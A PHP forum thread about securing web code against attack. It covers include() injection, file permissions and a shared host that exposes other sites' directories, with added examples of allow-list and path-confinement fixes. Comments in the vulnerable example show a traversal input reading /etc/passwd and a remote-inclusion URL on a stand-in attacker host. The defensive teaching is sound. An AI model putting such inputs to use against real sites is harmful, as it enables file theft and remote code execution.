Have you been hacked ?
Hi all,
Just a quick question. Has anyone of you been hacked? If it was your code, what did you do to correct it?
Dr Evil
Re: Have you been hacked ?
Dr Evil wrote:
> Hi all,
> Just a quick question. Has anyone of you been hacked? If it was your code, what did you do to correct it?

While I haven't been hacked, I spend a considerable amount of time securing my system, and yes, my code.
How do you secure your code? Start by assuming that an attacker wants in, and wants as much access as possible. The first place you want to look is for anything that would give him database or admin access to the application.
Next I look at file permissions. On a poorly configured host with loose permissions, it may be possible for an attacker to overwrite files and have them included in your code.
I even look at include() statements, as they often have things like include($somefile). If $somefile gets set by the user, and you don't do proper variable cleaning, you may be including THEIR code.
Finally, I try to reduce the dangerous system calls: things like exec(), fopen(), and so on.
Most importantly, I continue to do that, over and over again. I don't ever stop. Security is a process, not a one-time fix.
Hope that helps.
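The include() point in the post above is the one that most often turns into remote code execution in PHP, so here is an added example (not code from the original post or from its author) showing the pattern the post warns about next to a hardened form. The "pages/" directory, its file names and the `page` query parameter are assumptions made for the illustration; it assumes PHP 7.1 or later.

```php
<?php
// Added example, not from the original thread. Assumes a "pages/" directory
// beside this script that contains home.php, about.php and contact.php, and
// a "page" query parameter chosen by the visitor.

// VULNERABLE: the include path is exactly what the request says it is.
//   ?page=../../../../etc/passwd           -> reads an arbitrary local file
//   ?page=http://attacker.example/x.txt    -> runs the attacker's PHP if
//                                             allow_url_include is On
// Nothing here is "variable cleaning"; the user string reaches include() as-is.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: the request value is only ever used as an array key. The path
// that reaches include() is built entirely from strings we wrote ourselves,
// so "..", "/", null bytes or URLs in the parameter can never become a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;   // unknown page: refuse instead of guessing or sanitising
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

function render_page(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

render_page($_GET['page'] ?? 'home');
```

The allow-list is the important part: trying to strip "../" from the input instead is a losing game (encoded variants, "....//", absolute paths). As belt and braces, turn off `allow_url_include` (and, unless you need it, `allow_url_fopen`) in php.ini so a remote URL can never be included even if a bug slips through.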
Thanks. That sounds quite smart. I try to code as safely as possible, but can't help wondering if I'm up to date or if I thought of it all.
This question popped in when I read this post:
viewtopic.php?t=16997
Dr Evil wrote:
> Thanks. That sounds quite smart. I try to code as safely as possible, but can't help wondering if I'm up to date or if I thought of it all.

You probably haven't thought of it all, and probably aren't up to date.
Security is a trade-off. You are trading time spent securing the code to prevent time spent fixing what a hacker does if he gets in.
If you are spending 40 hours a week securing something that would take 2 hours to clean up, well, that's not a great trade-off.
It sounds like you genuinely care, and try to consistently apply secure principles, and that puts you ahead of 90%* of the coding population.
* - Statistic from "Lies, more lies and statistics - The art of making stuff up for online forum postings".
I haven't been hacked but I did hack the easyspace hosting provider once - entirely by accident. A folder browsing script with an "up a level" method jumped right out of the client's domain and spewed out a list of all the other sites on the (shared) host.
That was a year ago - they still haven't fixed their set up.
McGruff wrote:
> I haven't been hacked but I did hack the easyspace hosting provider once - entirely by accident. A folder browsing script with an "up a level" method jumped right out of the client's domain and spewed out a list of all the other sites on the (shared) host.
> That was a year ago - they still haven't fixed their set up.

That's not necessarily insecure.
It's non-optimal, and it definitely leaves room for bad things to happen; however, it's not in and of itself insecure.
Basically, it's not chrooting users. If you set up your scripts properly, and have your sensitive information in files that either aren't viewable by the web server, OR store sensitive information outside of the main web folders, then you should be able to avoid any security issues.
That being said, from your description, they don't use separate web/non-web trees, and a number of scripts MUST have sensitive information in files viewable by the web server user. So, yeah, it's probably insecure, but not for sure.
*I* certainly wouldn't host there.
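The host's lack of chrooting is their problem, but the folder-browsing script that walked "up a level" out of the client's tree is the script author's. Here is an added example (not code from the thread or from any poster) of how such a script can confine itself to its own document root regardless of how the host is set up. The base directory path and the `dir` query parameter are assumptions made for the illustration; it assumes PHP 7.1 or later.

```php
<?php
// Added example, not from the original thread. The base directory below is
// hypothetical; "dir" is the visitor-supplied path relative to that base.
$base = realpath('/home/client/public_html');
if ($base === false) {
    exit('base directory does not exist');
}

// Resolve the requested directory and refuse anything outside $base.
// realpath() collapses "..", "." and symlinks, so the comparison is made
// against where the path really lands, not against how the attacker spelled it.
function safe_dir(string $base, string $requested): ?string
{
    if (strpos($requested, "\0") !== false) {
        return null;                       // null bytes never belong in a path
    }
    $target = realpath($base . '/' . $requested);
    if ($target === false || !is_dir($target)) {
        return null;                       // missing, or not a directory
    }
    // Accept $base itself or a descendant of it. The separator after $base
    // stops "/home/client/public_html2" from passing as a prefix match.
    if ($target !== $base && strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // escaped the tree, e.g. "../../othersite"
    }
    return $target;
}

// List a directory, offering "up a level" only while the parent is still
// inside $base. Returns an empty list for anything that was refused.
function list_dir(string $base, string $requested): array
{
    $dir = safe_dir($base, $requested);
    if ($dir === null) {
        return [];
    }
    $entries = [];
    foreach (scandir($dir) ?: [] as $name) {
        if ($name === '.') {
            continue;
        }
        if ($name === '..') {
            if ($dir !== $base) {          // at the top of our tree there is no "up"
                $entries[] = '..';
            }
            continue;
        }
        $entries[] = $name;
    }
    return $entries;
}

$requested = $_GET['dir'] ?? '';
foreach (list_dir($base, $requested) as $entry) {
    echo htmlspecialchars($entry, ENT_QUOTES, 'UTF-8'), "\n";
}
```

With this check in place, `?dir=..` from the top level returns nothing instead of the neighbouring customers' directories, and `?dir=docs/../../..` is refused after realpath() resolves it, not after a string search for "../" that an encoded variant could slip past.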
microthick (Forum Regular, Vancouver, BC)

jimbothegrey (Forum Newbie)
I don't trust my code...
We use an engine called TotalShield from http://www.applicure.com
It sits outside the Apache/PHP and filters anything that can go wrong...
This is really nice addon... saves a lot of time...
They are also answering fast to questions/requests.
Cheers.